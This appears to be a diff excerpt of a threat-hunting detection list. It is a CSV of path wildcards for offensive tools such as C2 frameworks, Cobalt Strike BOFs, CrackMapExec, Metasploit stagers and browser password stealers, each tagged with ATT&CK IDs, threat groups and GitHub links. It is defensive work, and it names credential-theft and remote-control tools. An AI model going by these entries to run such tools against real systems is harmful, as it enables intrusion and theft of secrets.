+"*/chisel-linux_*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*/chisel-master*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - 
T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*/chisel-windows_amd6*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*/chrisk44/*","offensive_tool_keyword","Github Username","Github username known for network exploitation tools","N/A","N/A","N/A","N/A","Network Exploitation tools","https://github.com/chrisk44/Hijacker","1","1","N/A","N/A","10","2213","435","2020-08-26T19:01:31Z","2016-11-25T01:39:07Z"
+"*/chrome_decrypt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*/ChromeDump/*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z"
+"*/chromium_based_browsers.py*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*/cics-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/cics-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/cics-user-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/cics-user-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/CIMplant.exe*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"*/CIMplant.git*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"*/CIMplant/Commander.cs*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"*/citrix-brute-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/citrix-enum-apps.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/citrix-enum-apps-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/citrix-enum-servers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/citrix-enum-servers-xml.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/clamav-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/clickme.docx*","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","107","33","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z"
+"*/client/beef.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*/client/bof/*.asm*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*/Client/Commands/Enumeration.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*/Client/Commands/Execution.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*/Client/Commands/Injection.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*/Client/Commands/Lateral.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*/Client/Commands/Tokens.yaml*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/client/generated-stagers/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*/Client/Pages/Drones.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/Client/Pages/Payloads.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - 
TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/Client/Pages/Pivots.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/clipboardinject.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/clipboardinject/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/clipmon/clipmon.sln*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*/clipmon/dll/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10",,"N/A",,, +"*/CloakNDaggerC2*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" +"*/clock-skew.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/cloud_enum.git*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z"
+"*/cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z"
+"*/cloud_enum.txt*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z"
+"*/cloudbrute.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z"
+"*/cloudsploit.git*","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. 
These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","10","2922","641","2023-09-29T16:35:48Z","2015-06-29T15:33:40Z"
+"*/clown-newuser.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z"
+"*/cmd/c2.go*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
+"*/cmd/hades/*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z"
+"*/cmd_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z"
+"*/cmd_log.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web 
Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/cmd_stager*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/cmdstager/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/cme smb *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/cme winrm *","offensive_tool_keyword","crackmapexec","crackmapexec command lines. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/cme_adcs_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/cme_shares_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/cme_spooler_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/cmedb","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/CMSeek*","offensive_tool_keyword","CMSeek","CMS Detection and Exploitation suite - Scan WordPress. Joomla. Drupal and 130 other CMSs.","T1553 - T1580 - T1583 - T1584 ","TA0007","N/A","N/A","Web Attacks","https://github.com/Tuhinshubhra/CMSeek","1","0","N/A","N/A","10","2062","497","2023-07-03T12:17:20Z","2018-06-14T00:15:51Z"
+"*/Cn33liz*","offensive_tool_keyword","Github Username","Github username Red teamer @ Outflank. Passionate about networking and cybersecurity. 
known for exploitation tools dev","N/A","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
